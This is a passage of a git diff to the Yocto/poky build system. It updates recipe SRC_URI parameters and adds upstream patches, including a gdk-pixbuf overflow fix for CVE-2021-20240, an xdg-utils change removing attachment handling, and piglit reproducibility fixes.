"%s,",$0 }' | sed 's/,$//')) + + if [ -z "$TO" ] ; then + NEWMAILTO= +@@ -68,10 +67,6 @@ run_thunderbird() + NEWMAILTO="${NEWMAILTO},$BODY" + fi + +- if [ -n "$ATTACH" ] ; then +- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'" +- fi +- + NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//') + DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\"" + "$THUNDERBIRD" -compose "$NEWMAILTO" +-- +GitLab + diff --git a/poky/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/poky/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb index d371c5c28c..41b74b8598 100644 --- a/poky/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb +++ b/poky/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb @@ -20,6 +20,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014" SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \ file://0001-Reinstate-xdg-terminal.patch \ file://0001-Don-t-build-the-in-script-manual.patch \ + file://1f199813e0eb0246f63b54e9e154970e609575af.patch \ " SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff" diff --git a/poky/meta/recipes-extended/xinetd/xinetd_2.3.15.bb b/poky/meta/recipes-extended/xinetd/xinetd_2.3.15.bb index da81867115..765a34e842 100644 --- a/poky/meta/recipes-extended/xinetd/xinetd_2.3.15.bb +++ b/poky/meta/recipes-extended/xinetd/xinetd_2.3.15.bb @@ -13,7 +13,7 @@ PR = "r2" # Blacklist a bogus tag in upstream check UPSTREAM_CHECK_GITTAGREGEX = "xinetd-(?P<pver>(?!20030122).+)" -SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https \ +SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https;branch=master \ file://xinetd.init \ file://xinetd.conf \ file://xinetd.default \ diff --git a/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch b/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch new file mode 100644 index 0000000000..fe594b24bb --- /dev/null +++ b/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch @@ -0,0 +1,40 @@ +From 086e8adf4cc352cd11572f96066b001b545f354e Mon Sep 17 00:00:00 2001 +From: Emmanuele Bassi <ebassi@gnome.org> +Date: Wed, 1 Apr 2020 18:11:55 +0100 +Subject: [PATCH] Check the memset length argument + +Avoid overflows by using the checked multiplication macro for gsize. + +Fixes: #132 + +Upstream-Status: Backported [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/086e8adf4cc352cd11572f96066b001b545f354e] +CVE: CVE-2021-20240 + +Signed-off-by: Changqing Li <changqing.li@windriver.com> +--- + gdk-pixbuf/io-gif-animation.c | 6 +++++- + 1 file changed, 5 insertions(+), 1 deletion(-) + +diff --git a/gdk-pixbuf/io-gif-animation.c b/gdk-pixbuf/io-gif-animation.c +index c9db3c66e..49674fd2e 100644 +--- a/gdk-pixbuf/io-gif-animation.c ++++ b/gdk-pixbuf/io-gif-animation.c +@@ -412,11 +412,15 @@ gdk_pixbuf_gif_anim_iter_get_pixbuf (GdkPixbufAnimationIter *anim_iter) + + /* If no rendered frame, render the first frame */ + if (anim->last_frame == NULL) { ++ gsize len = 0; + if (anim->last_frame_data == NULL) + anim->last_frame_data = gdk_pixbuf_new (GDK_COLORSPACE_RGB, TRUE, 8, anim->width, anim->height); + if (anim->last_frame_data == NULL) + return NULL; +- memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, gdk_pixbuf_get_rowstride (anim->last_frame_data) * anim->height); ++ if (g_size_checked_mul (&len, gdk_pixbuf_get_rowstride (anim->last_frame_data), anim->height)) ++ memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, len); ++ else ++ return NULL; + composite_frame (anim, g_list_nth_data (anim->frames, 0)); + } + +-- +GitLab diff --git a/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb b/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb index 54861e83c6..60a04c3581 100644 --- a/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb +++ b/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb @@ -25,6 +25,7 @@ SRC_URI = "${GNOME_MIRROR}/${BPN}/${MAJ_VER}/${BPN}-${PV}.tar.xz \ file://0006-Build-thumbnailer-and-tests-also-in-cross-builds.patch \ file://missing-test-data.patch \ file://CVE-2020-29385.patch \ + file://CVE-2021-20240.patch \ " SRC_URI_append_class-target = " \ diff --git a/poky/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb b/poky/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb index 92b0d1d52f..0842f10ea9 100644 --- a/poky/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb +++ b/poky/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb @@ -102,7 +102,7 @@ EOF # from the target sysroot. cat > ${B}/g-ir-scanner-wrapper << EOF #!/bin/sh -# This prevents g-ir-scanner from writing cache data to $HOME +# This prevents g-ir-scanner from writing cache data to user's HOME dir export GI_SCANNER_DISABLE_CACHE=1 g-ir-scanner --lib-dirs-envvar=GIR_EXTRA_LIBS_PATH --use-binary-wrapper=${STAGING_BINDIR}/g-ir-scanner-qemuwrapper --use-ldd-wrapper=${STAGING_BINDIR}/g-ir-scanner-lddwrapper --add-include-path=${STAGING_DATADIR}/gir-1.0 --add-include-path=${STAGING_LIBDIR}/gir-1.0 "\$@" diff --git a/poky/meta/recipes-graphics/glew/glew/notempdir.patch b/poky/meta/recipes-graphics/glew/glew/notempdir.patch new file mode 100644 index 0000000000..8d79ce0cdf --- /dev/null +++ b/poky/meta/recipes-graphics/glew/glew/notempdir.patch @@ -0,0 +1,19 @@ +We don't use the dist-* targets and hence DIST_DIR isn't used. The current code +creates a new temp directory in /tmp/ for every invocation of make. Lets +not do that. + +Upstream-Status: Pending [a revised version would be needed for upstream] +Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org> + +Index: glew-2.2.0/Makefile +=================================================================== +--- glew-2.2.0.orig/Makefile ++++ glew-2.2.0/Makefile +@@ -56,7 +56,6 @@ DIST_SRC_ZIP ?= $(shell pwd)/$(DIST_NAME + DIST_SRC_TGZ ?= $(shell pwd)/$(DIST_NAME).tgz + DIST_WIN32 ?= $(shell pwd)/$(DIST_NAME)-win32.zip + +-DIST_DIR := $(shell mktemp -d /tmp/glew.XXXXXX)/$(DIST_NAME) + + # To disable stripping of linked binaries either: + # - use STRIP= on gmake command-line diff --git a/poky/meta/recipes-graphics/glew/glew_2.2.0.bb b/poky/meta/recipes-graphics/glew/glew_2.2.0.bb index 92b6083648..d7a26a3438 100644 --- a/poky/meta/recipes-graphics/glew/glew_2.2.0.bb +++ b/poky/meta/recipes-graphics/glew/glew_2.2.0.bb @@ -7,6 +7,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=2ac251558de685c6b9478d89be3149c2" SRC_URI = "${SOURCEFORGE_MIRROR}/project/glew/glew/${PV}/glew-${PV}.tgz \ file://0001-Fix-build-race-in-Makefile.patch \ + file://notempdir.patch \ file://no-strip.patch" SRC_URI[md5sum] = "3579164bccaef09e36c0af7f4fd5c7c7" diff --git a/poky/meta/recipes-graphics/libfakekey/libfakekey_git.bb b/poky/meta/recipes-graphics/libfakekey/libfakekey_git.bb index ab6f5ac9ed..33ea6fe5a9 100644 --- a/poky/meta/recipes-graphics/libfakekey/libfakekey_git.bb +++ b/poky/meta/recipes-graphics/libfakekey/libfakekey_git.bb @@ -13,7 +13,7 @@ SECTION = "x11/wm" SRCREV = "7ad885912efb2131e80914e964d5e635b0d07b40" PV = "0.3+git${SRCPV}" -SRC_URI = "git://git.yoctoproject.org/${BPN}" +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb b/poky/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb index 1a31677978..06bd682823 100644 --- a/poky/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb +++ b/poky/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb @@ -17,7 +17,7 @@ DEPENDS = "virtual/libx11 libxext" #SRCREV for 1.12 SRCREV = "e846ee434f8e23d9db38af13c523f791495e0e87" -SRC_URI = "git://git.yoctoproject.org/${BPN}" +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-graphics/libva/libva-utils_2.6.0.bb b/poky/meta/recipes-graphics/libva/libva-utils_2.6.0.bb index 03b38027a1..f14ed0f52b 100644 --- a/poky/meta/recipes-graphics/libva/libva-utils_2.6.0.bb +++ b/poky/meta/recipes-graphics/libva/libva-utils_2.6.0.bb @@ -14,7 +14,7 @@ SECTION = "x11" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://COPYING;md5=b148fc8adf19dc9aec17cf9cd29a9a5e" -SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.6-branch" +SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.6-branch;protocol=https" SRCREV = "8ea1eba433dcbceb0e5dcb54b8e3f984987f7a17" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb b/poky/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb index a08eb252ce..3ea67d09d6 100644 --- a/poky/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb +++ b/poky/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb @@ -12,7 +12,7 @@ DEPENDS = "libmatchbox virtual/libx11 libxext libxrender startup-notification ex # SRCREV tagged 1.2.2 SRCREV = "27da947e7fbdf9659f7e5bd1e92af92af6c03970" -SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager \ +SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager;branch=master \ file://0001-Fix-build-with-gcc-10.patch \ file://kbdconfig" diff --git a/poky/meta/recipes-graphics/mesa/mesa.inc b/poky/meta/recipes-graphics/mesa/mesa.inc index a1bf878b1a..bfab19e773 100644 --- a/poky/meta/recipes-graphics/mesa/mesa.inc +++ b/poky/meta/recipes-graphics/mesa/mesa.inc @@ -231,7 +231,7 @@ python mesa_populate_packages() { import re dri_drivers_root = oe.path.join(d.getVar('PKGD'), d.getVar('libdir'), "dri") if os.path.isdir(dri_drivers_root): - dri_pkgs = os.listdir(dri_drivers_root) + dri_pkgs = sorted(os.listdir(dri_drivers_root)) lib_name = d.expand("${MLPREFIX}mesa-megadriver") for p in dri_pkgs: m = re.match(r'^(.*)_dri\.so$', p) diff --git a/poky/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb b/poky/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb index 58a6997ffe..88101b5dcc 100644 --- a/poky/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb +++ b/poky/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb @@ -7,7 +7,7 @@ PV = "1.4.7+git${SRCPV}" # Exclude x.99.x versions from upstream checks UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>^\d+(\.(?!99)\d+)+)" -SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4 \ +SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4;protocol=https \ file://fix-test-includes.patch \ " S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch b/poky/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch new file mode 100644 index 0000000000..caa48e088d --- /dev/null +++ b/poky/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch @@ -0,0 +1,27 @@ +From d623e9797b7ee9b3739a8a4afe1a01f7e03754aa Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin <alex.kanavin@gmail.com> +Date: Sun, 1 Nov 2020 20:08:49 +0000 +Subject: [PATCH] Add a missing include for htobe32 definition + +Upstream-Status: Pending +Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> +--- + tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c | 2 ++ + 1 file changed, 2 insertions(+) + +diff --git a/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c b/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c +index 5f45e0c23..c755ee29a 100644 +--- a/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c ++++ b/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c +@@ -34,6 +34,8 @@ + + #include "piglit-util-gl.h" + ++#include <endian.h> ++ + #define IMAGE_WIDTH 60 + #define IMAGE_HEIGHT 60 + +-- +2.17.1 + diff --git a/poky/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch b/poky/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch new file mode 100644 index 0000000000..cc9482c047 --- /dev/null +++ b/poky/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch @@ -0,0 +1,31 @@ +From 9086d42df1f3134bafcfe33ff16db7bbb9d9a0fd Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin <alex.kanavin@gmail.com> +Date: Mon, 30 Nov 2020 23:08:22 +0000 +Subject: [PATCH] framework/profile.py: make test lists reproducible + +These are created with os.walk, which yields different +order depending on where it's run. + +Upstream-Status: Pending +Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> +--- + framework/profile.py | 6 +++++- + 1 file changed, 5 insertions(+), 1 deletion(-) + +diff --git a/framework/profile.py b/framework/profile.py +index c210e535e..9b5d51d68 100644 +--- a/framework/profile.py ++++ b/framework/profile.py +@@ -528,7 +528,11 @@ class TestProfile(object): + else: + opts[n] = self.test_list[n] + else: +- opts = self.test_list # pylint: disable=redefined-variable-type ++ opts = collections.OrderedDict() ++ test_keys = list(self.test_list.keys()) ++ test_keys.sort() ++ for k in test_keys: ++ opts[k] = self.test_list[k] + + for k, v in self.filters.run(opts.items()): + yield k, v diff --git a/poky/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch b/poky/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch new file mode 100644 index 0000000000..8704f98500 --- /dev/null +++ b/poky/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch @@ -0,0 +1,44 @@ +From 1b23539aece156f6fe0789cb988f22e5915228f6 Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin <alex.kanavin@gmail.com> +Date: Tue, 10 Nov 2020 17:12:32 +0000 +Subject: [PATCH 1/2] generated_tests/gen_tcs/tes_input_tests.py: do not + hardcode the full binary path + +This helps reproducibility. + +Upstream-Status: Pending +Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> +--- + generated_tests/gen_tcs_input_tests.py | 2 +- + generated_tests/gen_tes_input_tests.py | 2 +- + 2 files changed, 2 insertions(+), 2 deletions(-) + +diff --git a/generated_tests/gen_tcs_input_tests.py b/generated_tests/gen_tcs_input_tests.py +index face4f19a..e36671af4 100644 +--- a/generated_tests/gen_tcs_input_tests.py ++++ b/generated_tests/gen_tcs_input_tests.py +@@ -272,7 +272,7 @@ class Test(object): + relative probe rgb (0.75, 0.75) (0.0, 1.0, 0.0) + """) + +- test = test.format(self=self, generator_command=" ".join(sys.argv)) ++ test = test.format(self=self, generator_command="generated_tests/gen_tcs_input_tests.py") + + filename = self.filename() + dirname = os.path.dirname(filename) +diff --git a/generated_tests/gen_tes_input_tests.py b/generated_tests/gen_tes_input_tests.py +index 3d847b5cc..954840b20 100644 +--- a/generated_tests/gen_tes_input_tests.py ++++ b/generated_tests/gen_tes_input_tests.py +@@ -301,7 +301,7 @@ class Test(object): + relative probe rgb (0.75, 0.75) (0.0, 1.0, 0.0) + """) + +- test = test.format(self=self, generator_command=" ".join(sys.argv)) ++ test = test.format(self=self, generator_command="generated_tests/gen_tes_input_tests.py") + + filename = self.filename() + dirname = os.path.dirname(filename) +-- +2.17.1 + diff --git a/poky/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch b/poky/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch new file mode 100644 index 0000000000..2efba6f866 --- /dev/null +++ b/poky/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch @@ -0,0 +1,30 @@ +From 1919bb7f4072d73dcbb64d0e06eff5b04529c3db Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin <alex.kanavin@gmail.com> +Date: Mon, 16 Nov 2020 18:01:02 +0000 +Subject: [PATCH] serializer.py: make .gz files reproducible + +.gz format contains mtime of the compressed data, and +SOURCE_DATE_EPOCH is the standard way to make it reproducuble. + +Upstream-Status: Pending +Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> +--- + tests/serializer.py | 5 ++++- + 1 file changed, 4 insertions(+), 1 deletion(-) + +diff --git a/tests/serializer.py b/tests/serializer.py +index bd14bc3db..bc5b45d7f 100644 +--- a/tests/serializer.py ++++ b/tests/serializer.py +@@ -138,7 +138,10 @@ def serializer(name, profile, outfile): + et.SubElement(env, 'env', name=k, value=v) + + tree = et.ElementTree(root) +- with gzip.open(outfile, 'wb') as f: ++ reproducible_mtime = None ++ if 'SOURCE_DATE_EPOCH' in os.environ: ++ reproducible_mtime=os.environ['SOURCE_DATE_EPOCH'] ++ with gzip.GzipFile(outfile, 'wb', mtime=reproducible_mtime) as f: + tree.write(f, encoding='utf-8', xml_declaration=True) + + diff --git a/poky/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch b/poky/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch new file mode 100644 index 0000000000..8321be8490 --- /dev/null +++ b/poky/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch @@ -0,0 +1,28 @@ +From 5bf89c6a314952313b2b762fff0d5501fe57ac53 Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin <alex.kanavin@gmail.com> +Date: Wed, 2 Dec 2020 21:21:52 +0000 +Subject: [PATCH] tests/shader.py: sort the file list before working on it + +This allows later xml output to be reproducible. + +Upstream-Status: Pending +Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> +--- + tests/shader.py | 4 +++- + 1 file changed, 3 insertions(+), 1 deletion(-) + +diff --git a/tests/shader.py b/tests/shader.py +index 849273660..e6e65d1ba 100644 +--- a/tests/shader.py ++++ b/tests/shader.py +@@ -52,7 +52,9 @@ for basedir in [TESTS_DIR, GENERATED_TESTS_DIR]: + for group, files in shader_tests.items(): + assert group not in profile.test_list, 'duplicate group: {}'.format(group) + +- # We'll end up with a list of tuples, split that into two lists ++ # This makes the xml output reproducible, as os.walk() order is random ++ files.sort() ++ # We'll end up with a list of tuples, split that into two list + files, installedfiles = list(zip(*files)) + files = list(files) + installedfiles = list(installedfiles) diff --git a/poky/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch b/poky/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch new file mode 100644 index 0000000000..16c7c5c803 --- /dev/null +++ b/poky/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch @@ -0,0 +1,30 @@ +From 1c67250308a92d4991ed05d9d240090ab84accae Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin <alex.kanavin@gmail.com> +Date: Tue, 10 Nov 2020 17:13:50 +0000 +Subject: [PATCH 2/2] tests/util/piglit-shader.c: do not hardcode build path + into target binary + +This helps reproducibilty. + +Upstream-Status: Inappropriate [oe-core specific] +Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> +--- + tests/util/piglit-shader.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/tests/util/piglit-shader.c b/tests/util/piglit-shader.c +index 4fd68d21e..c9ea8295e 100644 +--- a/tests/util/piglit-shader.c ++++ b/tests/util/piglit-shader.c +@@ -73,7 +73,7 @@ piglit_compile_shader(GLenum target, const char *filename) + + source_dir = getenv("PIGLIT_SOURCE_DIR"); + if (source_dir == NULL) { +- source_dir = SOURCE_DIR; ++ source_dir = "."; + } + + snprintf(filename_with_path, FILENAME_MAX - 1, +-- +2.17.1 + diff --git a/poky/meta/recipes-graphics/piglit/piglit_git.bb b/poky/meta/recipes-graphics/piglit/piglit_git.bb index 4229412554..9897ef1575 100644 --- a/poky/meta/recipes-graphics/piglit/piglit_git.bb +++ b/poky/meta/recipes-graphics/piglit/piglit_git.bb @@ -6,13 +6,19 @@ BUGTRACKER = "https://gitlab.freedesktop.org/mesa/piglit/-/issues" LICENSE = "MIT & LGPLv2+ & GPLv3 & GPLv2+ & BSD-3-Clause" LIC_FILES_CHKSUM = "file://COPYING;md5=b2beded7103a3d8a442a2a0391d607b0" -SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https \ +SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https;branch=main \ file://0001-cmake-install-bash-completions-in-the-right-place.patch \ file://0001-cmake-use-proper-WAYLAND_INCLUDE_DIRS-variable.patch \ + file://0001-Add-a-missing-include-for-htobe32-definition.patch \ + file://0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch \ + file://0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch \ + file://0001-serializer.py-make-.gz-files-reproducible.patch \ + file://0001-framework-profile.py-make-test-lists-reproducible.patch \ + file://0001-tests-shader.py-sort-the-file-list-before-working-on.patch \ " UPSTREAM_CHECK_COMMITS = "1" -SRCREV = "6126c2d4e476c7770d216ffa1932c10e2a5a7813" +SRCREV = "83bc56abf2686e2cd9024a152e121ca4aa524985" # (when PV goes above 1.0 remove the trailing r) PV = "1.0+gitr${SRCPV}" @@ -37,7 +43,9 @@ do_compile[dirs] =+ "${B}/temp/" PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'x11', d)}" PACKAGECONFIG[freeglut] = "-DPIGLIT_USE_GLUT=1,-DPIGLIT_USE_GLUT=0,freeglut," PACKAGECONFIG[x11] = "-DPIGLIT_BUILD_GL_TESTS=ON,-DPIGLIT_BUILD_GL_TESTS=OFF,${X11_DEPS}, ${X11_RDEPS}" +PACKAGECONFIG[vulkan] = "-DPIGLIT_BUILD_VK_TESTS=ON,-DPIGLIT_BUILD_VK_TESTS=OFF,vulkan-loader" +export PIGLIT_BUILD_DIR = "../../../../git" do_configure_prepend() { if [ "${@bb.utils.contains('PACKAGECONFIG', 'freeglut', 'yes', 'no', d)}" = "no" ]; then diff --git a/poky/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb b/poky/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb index 1046b8504f..772db5bbaf 100644 --- a/poky/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb +++ b/poky/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=c81c08eeefd9418fca8f88309a76db10" DEPENDS = "libdrm mesa libepoxy" SRCREV = "7d204f3927be65fb3365dce01dbcd04d447a4985" -SRC_URI = "git://anongit.freedesktop.org/virglrenderer \ +SRC_URI = "git://anongit.freedesktop.org/virglrenderer;branch=master \ file://0001-gallium-Expand-libc-check-to-be-platform-OS-check.patch \ file://0001-meson.build-use-python3-directly-for-python.patch \ " diff --git a/poky/meta/recipes-graphics/vulkan/assimp_5.0.1.bb b/poky/meta/recipes-graphics/vulkan/assimp_5.0.1.bb index 5a8c62e64d..295ac12fc5 100644 --- a/poky/meta/recipes-graphics/vulkan/assimp_5.0.1.bb +++ b/poky/meta/recipes-graphics/vulkan/assimp_5.0.1.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2119edef0916b0bd511cb3c731076271" DEPENDS = "zlib" -SRC_URI = "git://github.com/assimp/assimp.git;branch=assimp_5.0_release \ +SRC_URI = "git://github.com/assimp/assimp.git;branch=assimp_5.0_release;protocol=https \ file://0001-closes-https-github.com-assimp-assimp-issues-2733-up.patch \ file://0001-Use-ASSIMP_LIB_INSTALL_DIR-to-search-library.patch \ " diff --git a/poky/meta/recipes-graphics/vulkan/vulkan-demos_git.bb b/poky/meta/recipes-graphics/vulkan/vulkan-demos_git.bb index c94e768b52..b212814759 100644 --- a/poky/meta/recipes-graphics/vulkan/vulkan-demos_git.bb +++ b/poky/meta/recipes-graphics/vulkan/vulkan-demos_git.bb @@ -8,9 +8,9 @@ LIC_FILES_CHKSUM = "file://LICENSE.md;md5=dcf473723faabf17baa9b5f2207599d0 \ SRCREV_glm = "1ad55c5016339b83b7eec98c31007e0aee57d2bf" SRCREV_gli = "7da5f50931225e9819a26d5cb323c5f42da50bcd" -SRC_URI = "git://github.com/SaschaWillems/Vulkan.git \ - git://github.com/g-truc/glm;destsuffix=git/external/glm;name=glm \ - git://github.com/g-truc/gli;destsuffix=git/external/gli;name=gli \ +SRC_URI = "git://github.com/SaschaWillems/Vulkan.git;branch=master;protocol=https \ + git://github.com/g-truc/glm;destsuffix=git/external/glm;name=glm;branch=master;protocol=https \ + git://github.com/g-truc/gli;destsuffix=git/external/gli;name=gli;branch=master;protocol=https \ file://0001-Don-t-build-demos-with-questionably-licensed-data.patch \ " UPSTREAM_CHECK_COMMITS = "1" diff --git a/poky/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb b/poky/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb index b9658d3afa..c58a801e03 100644 --- a/poky/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb +++ b/poky/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb @@ -9,7 +9,7 @@ SECTION = "libs" LICENSE = "Apache-2.0" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57" -SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=sdk-1.1.126" +SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=sdk-1.1.126;protocol=https" SRCREV = "5bc459e2921304c32568b73edaac8d6df5f98b84" diff --git a/poky/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb b/poky/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb index 504cf85a2b..c8352bf31d 100644 --- a/poky/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb +++ b/poky/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb @@ -9,7 +9,7 @@ SECTION = "libs" LICENSE = "Apache-2.0" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=7dbefed23242760aa3475ee42801c5ac" -SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git;branch=sdk-1.1.126" +SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git;branch=sdk-1.1.126;protocol=https" SRCREV = "4adad4ff705fa76f9edb2d37cb57e593decb60ed" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb b/poky/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb index 8eef1bca73..ec65f11952 100644 --- a/poky/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb +++ b/poky/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb @@ -6,7 +6,7 @@ SECTION = "libs" LICENSE = "Apache-2.0" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57" -SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.1.126" +SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.1.126;protocol=https" SRCREV = "09695dfc5dbe54f869aeaff8db93bb7bb6a220e0" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-graphics/waffle/waffle_1.6.0.bb b/poky/meta/recipes-graphics/waffle/waffle_1.6.0.bb index 14d6a61525..f0dc780ca1 100644 --- a/poky/meta/recipes-graphics/waffle/waffle_1.6.0.bb +++ b/poky/meta/recipes-graphics/waffle/waffle_1.6.0.bb @@ -3,17 +3,19 @@ DESCRIPTION = "A cross-platform C library that allows one to defer selection \ of an OpenGL API and window system until runtime. For example, on Linux, Waffle \ enables an application to select X11/EGL with an OpenGL 3.3 core profile, \ Wayland with OpenGL ES2, and other window system / API combinations." -HOMEPAGE = "http://www.waffle-gl.org/" +HOMEPAGE = "https://gitlab.freedesktop.org/mesa/waffle" BUGTRACKER = "https://gitlab.freedesktop.org/mesa/waffle" LICENSE = "BSD-2-Clause" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=4c5154407c2490750dd461c50ad94797 \ file://include/waffle/waffle.h;endline=24;md5=61dbf8697f61c78645e75a93c585b1bf" -SRC_URI = 